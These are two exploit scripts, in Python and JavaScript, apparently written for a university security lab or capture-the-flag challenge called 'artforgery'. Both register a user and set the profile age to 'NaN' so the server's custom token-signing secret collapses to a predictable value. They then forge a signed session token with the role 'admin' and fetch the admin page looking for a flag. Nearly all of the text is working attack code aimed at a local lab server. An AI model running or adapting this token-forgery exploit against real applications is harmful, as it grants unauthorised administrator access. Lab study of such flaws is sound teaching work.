File: labs/lab-6-vulncomp2/artforgery/sploit.py
import requests
import base64
import json
import hashlib
import hmac
import urllib.parse
import re

# Server URL
url = 'http://localhost:3000'

# User credentials
username = 'your_username'
password = 'your_password'
supersecret = '1337'
# Register and login to get a valid token
session = requests.Session()

# Register
session.post(f'{url}/register', data={
    'username': username,
    'password': password,
    'nickname': 'nickname',
    'age': '25',
    'interests': 'interests'
})

# Extract the token from cookies
token = session.cookies.get('token')
token = urllib.parse.unquote(token)
print(f'Original Token: {token}')

def create_signature(payload, secret):
    print(f'{payload}:{secret}')
    return hmac.new(str(secret).encode("utf-8"), payload.encode(), hashlib.sha256).hexdigest()

def custom_jwt_sign(data, secret):
    payload = json.loads(base64.b64decode(data))
    pl = base64.b64encode(json.dumps(payload, separators=(',', ':')).encode()).decode()
    print(f'{pl}:{secret}')
    signature = create_signature(f'{pl}:{secret}', 'NaN')
    return f'{signature}'

def custom_jwt_forge(payload, role):
    # Replace age and role using regex
    new_token = base64.b64decode(payload.split('.')[0]).decode()
    print(new_token)
    new_token = re.sub(r'"age":"[^"]+"', '"age":"NaN"', new_token)
    new_token = re.sub(r'"role":"[^"]+"', f'"role":"{role}"', new_token)
    print(new_token)
    new_token = base64.b64encode(new_token.encode()).decode()
    signature = custom_jwt_sign(new_token, 'NaN')
    forged_payload = new_token.replace('=', '%3d')
    return f'{forged_payload}.{signature}'

# Decode the original token
payload, signature = token.split('.')
payload_json = json.loads(base64.b64decode(payload))

# Update profile to set the age to a non-numerical value
response = session.post(f'{url}/update-profile', data={
    'username': username,
    'password': password,
    'nickname': 'nickname',
    'age': 'NaN',
    'interests': 'interests'
}, headers={'Cookie': f'token={urllib.parse.quote(token)}'})

print(response.text)

if response.status_code != 200:
    print('Failed to update profile')
    exit(1)

# Login again to get a new token
response = session.post(f'{url}/login', data={
    'username': username,
    'password': password
})

new_token = session.cookies.get('token')
new_token = urllib.parse.unquote(new_token)
print(f'New Token: {new_token}')

# Forge the token with the modified payload
forged_token = custom_jwt_forge(new_token, 'admin')
print(f'Forged Token: {forged_token}')

# URL encode the forged token to handle special characters
forged_token_encoded = forged_token

# Send the forged token to the server
session.cookies.set('token', forged_token_encoded)
response = session.get(f'{url}/admin')

if 'flag' in response.text.lower():
    print('Exploit successful! Admin page accessed.')
else:
    print('Exploit failed.')

print(response.text)

File: labs/lab-6-vulncomp2/artforgery/sploit.js
const axios = require('axios');
const crypto = require('crypto');
const querystring = require('querystring');

// Server URL
const url = 'http://localhost:3000';

// User credentials
const username = 'your_username';
const password = 'your_password';

// Function to create signature
function createSignature(payload, secret) {
    return crypto.createHmac('sha256', secret).update(payload).digest('hex');
}

// Function to sign JWT
function customJwtSign(data, secret) {
    const payload = JSON.parse(Buffer.from(data, 'base64').toString());
    const timestamp = payload.timestamp;
    const pl = Buffer.from(JSON.stringify(payload)).toString('base64');
    const superSecret = (secret ^ timestamp) + parseFloat(payload.age);
    const signature = createSignature(`${pl}:${superSecret}`, '');
    return `${signature}`;
}

// Function to forge JWT
function customJwtForge(payload, role) {
    let newToken = Buffer.from(payload.split('.')[0], 'base64').toString();
    newToken = newToken.replace(/"age":"[^"]+"/, '"age":"NaN"');
    newToken = newToken.replace(/"role":"[^"]+"/, `"role":"${role}"`);
    newToken = Buffer.from(newToken).toString('base64');
    const signature = customJwtSign(newToken, 1337);
    const forgedPayload = newToken.replace(/=/g, '%3d');
    return `${forgedPayload}.${signature}`;
}

// Extract the token from cookies
function getTokenFromCookies(cookies) {
    const tokenCookie = cookies.find(cookie => cookie.startsWith('token='));
    if (!tokenCookie) {
        throw new Error('Token cookie not found');
    }
    return decodeURIComponent(tokenCookie.split('=')[1]);
}

// Register and login to get a valid token
async function runExploit() {
    const session = axios.create({
        withCredentials: true
    });

    // Register
    let response = await session.post(`${url}/register`, querystring.stringify({
        username: username,
        password: password,
        nickname: 'nickname',
        age: '25',
        interests: 'interests'
    }));

    let token = '';
    let cookies = response.headers['set-cookie'].filter(cookie => !cookie.startsWith('connect.sid'));
    try {
        token = getTokenFromCookies(cookies);
    } catch (e) {
        console.log('Failed to register');
        // log response text
        console.log(response.data);
    }
    console.log(`Original Token: ${token}`);

    // Decode the original token
    let [payload, signature] = token.split('.');
    let payloadJson = JSON.parse(Buffer.from(payload, 'base64').toString());

    // Update profile to set the age to a non-numerical value
    response = await session.post(`${url}/update-profile`, querystring.stringify({
        username: username,
        password: password,
        nickname: 'nickname',
        age: 'NaN',
        interests: 'interests'
    }), {
        headers: {
            Cookie: `token=${encodeURIComponent(token)}`
        }
    });

    console.log(response.data);

    if (response.status !== 200) {
        console.log('Failed to update profile');
        return;
    }

    // Login again to get a new token
    response = await session.post(`${url}/login`, querystring.stringify({
        username: username,
        password: password
    }));

    cookies = response.headers['set-cookie'].filter(cookie => !cookie.startsWith('connect.sid'));
    let newToken = getTokenFromCookies(cookies);
    console.log(`New Token: ${newToken}`);

    // Forge the token with the modified payload
    let forgedToken = customJwtForge(newToken, 'admin');
    console.log(`Forged Token: ${forgedToken}`);

    // Send the forged token to the server
    session.defaults.headers.Cookie = `token=${forgedToken}`;
    response = await session.get(`${url}/admin`);

    if (response.data.toLowerCase().includes('flag')) {
        console.log('Exploit successful! Admin page accessed.');
    } else {
        console.log('Exploit failed.');
    }

    console.log(response.data);
}

runExploit();
